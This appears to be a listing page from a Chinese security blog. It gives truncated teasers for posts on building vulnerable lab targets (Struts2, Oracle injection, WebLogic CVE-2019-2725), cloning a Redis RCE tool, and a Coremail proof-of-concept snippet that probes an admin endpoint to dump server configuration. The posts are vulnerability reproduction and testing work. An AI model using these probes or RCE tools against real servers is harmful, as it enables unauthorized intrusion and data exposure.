struts2 靶机docker

本来想着来弄几个st2 的老漏洞来测试一下 找了一圈。还是选择了docker 进入dockerhub  找了一下。发现有一个全版本的老的st2  This image contains demo applications for...

Redis-RCE

远程代码执行redis4和redis5 来自https://github.com/jas502n/Redis-RCE python代码 [root@btmail script]# git clone https://github.com/jas502n/Redis-RCE.git ...

搭建oracle 注入环境

碰到了一个很复杂的SQL 注入的oracle 注入坑。 那么就弄一个本地测试环境吧 环境:Centos 7.4   64 那么首先弄一个oracle 环境 想了一下还是用Docker 了 dock...

CVE-2019-2725 绕过 复现

CVE-2019-2725 绕过 复现 系统版本 Centos7.5 JDK 版本:jdk1.6.0_45     :直接去官网下载 weblogic 版本:10.3.6      : 直接去官网下载 ...

coremail poc

import requests,sys def mailsmsPoC(url): url = url + "/mailsms/s?func=ADMIN:appState&dumpConfig=/" r = requests.get(url) if (r.status_code != '404') and ("/home/coremail...

CVE-2019-2725 复现

Docker 搭建环境 docker pull ismaleiva90/weblogic12 docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest http://localhost:49163/console User: weblogi...